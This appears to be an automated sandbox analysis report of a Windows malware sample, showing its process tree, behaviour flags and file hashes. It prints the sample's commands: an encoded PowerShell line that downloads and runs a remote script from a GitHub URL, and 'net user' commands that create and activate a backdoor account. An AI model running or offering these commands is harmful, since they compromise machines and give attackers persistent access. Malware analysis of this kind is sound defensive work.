C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:4080
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2644
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes1⤵PID:1628
-
C:\Windows\system32\net.exenet user wgautilacc 1112132⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 1112133⤵PID:2548
-
C:\Windows\system32\net.exenet user wgautilacc /active:yes2⤵PID:3620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc /active:yes3⤵PID:2208
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
a973a40c3594d9b42da3edb3cd9adf65
SHA1e264f31b58285c0da38fc0bb8534b92ade7936ab
SHA2562011308040b648289c1fbbf05db1a69d85449af900669046149fc1a94530d5e4
SHA5127557c52b6d1dbc32ec7ffcfe3afeb4614e5246a9a3d84bf59853e8aff872682e5041217412e08043072af87364daec54a13faf070889c96e8004d516ff8f251e
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
MD5
46fc4a5e10c710882d06336ee0e5a17f
SHA1c228ca6814d2e6a119aa2635c125333f209e3c09
SHA2567d42a798bfde65c3c0c81a89bea6baba95bab2fbd0fdd406560b34f079f899ea
SHA51271711cf9559fe3df859280d123975960c99f0c221dd4e249340e604323b22b1afe05d45adad717d45e958414650720bd2e54a953bd0bb3ff2f6b158c7e005238
-
MD5
e071af33fd92727e48652c2ab2caed94
SHA17d25eb0bb214d20d6d9a7741e40c26f4b0a3d616
SHA2567ec5dfb74b5cf17b2444c016ffdf6fb65acf0447baaf3f09502b906cb0b73c56
SHA5125809d01409f71f20e56c5516859325f62ddc34a5544cf0995d296f5951cea2efd242d5ca6391e730e503da1c7e1d75a57ad4ac0cc5096a8bbfce2664bb9093ce
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
74fea6194bb71b49254d9719e3128e25
SHA15c390cf50b8d5455494882dd735fc4346be4fa88
SHA2564900bd9b41421ad903fa87bb1e786408cd55fdbff445d78f6d7d18deb1e365c2
SHA51290efaeb509d0dcb8dd35598be01acf4c7d78ba338a8c1a55295ff2e04af26ccde48fc73eb916403432c4c81ef660cad1012f03ba0e7f5ff0c959336b12791261
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b